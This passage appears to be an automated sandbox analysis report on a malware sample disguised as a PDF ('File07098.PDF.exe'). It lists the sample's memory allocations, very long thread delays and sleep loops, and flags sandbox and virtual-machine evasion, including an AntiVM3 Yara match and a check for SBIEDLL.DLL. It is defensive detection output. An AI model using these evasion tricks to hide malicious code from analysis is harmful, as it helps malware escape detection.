                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: File07098.PDF.exe, 00000000.00000002.2078600685.0000000002476000.00000004.00000800.00020000.00000000.sdmp, Current.exe, 00000005.00000002.2265233058.0000000002B86000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\File07098.PDF.exeMemory allocated: A40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeMemory allocated: 23D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeMemory allocated: 43D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1230000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeMemory allocated: 28D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeMemory allocated: 2AE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeMemory allocated: 2A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2380000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599014Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598141Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597702Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595952Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595839Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595731Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595606Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595391Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598872Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598218Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598109Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597890Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597781Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596797Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596466Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595047Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeWindow / User API: threadDelayed 5462Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exeWindow / User API: threadDelayed 1682Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2344Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7511Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeWindow / User API: threadDelayed 1659Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exeWindow / User API: threadDelayed 4315Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 8627Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1227Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -99891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 5796Thread sleep count: 5462 > 30Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 6620Thread sleep count: 1682 > 30Jump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -99766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -99656s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -99547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -99438s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -99313s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -99188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -99063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -98909s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -98740s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -98568s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -98391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -98190s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -98053s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -97047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96591s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96141s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\File07098.PDF.exe TID: 4912Thread sleep time: -96031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -25825441703193356s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599890s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6388Thread sleep count: 2344 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6388Thread sleep count: 7511 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599781s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599562s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599453s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599344s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599234s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599125s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -599014s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598906s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598797s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598687s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598578s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598359s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598250s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598141s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -598031s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597922s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597812s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597702s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597594s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597484s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597265s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597156s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -597047s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596937s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596828s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596719s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596609s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596390s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596281s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596172s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -596062s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595952s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595839s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595731s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595606s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595391s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595172s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -595062s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -594844s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -594734s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -594625s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5632Thread sleep time: -594515s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3376Thread sleep count: 1659 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -99874s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3376Thread sleep count: 4315 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -99750s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -99640s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -99531s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Current.exe TID: 3288Thread sleep time: -99422s >= -30000sJump to behavior
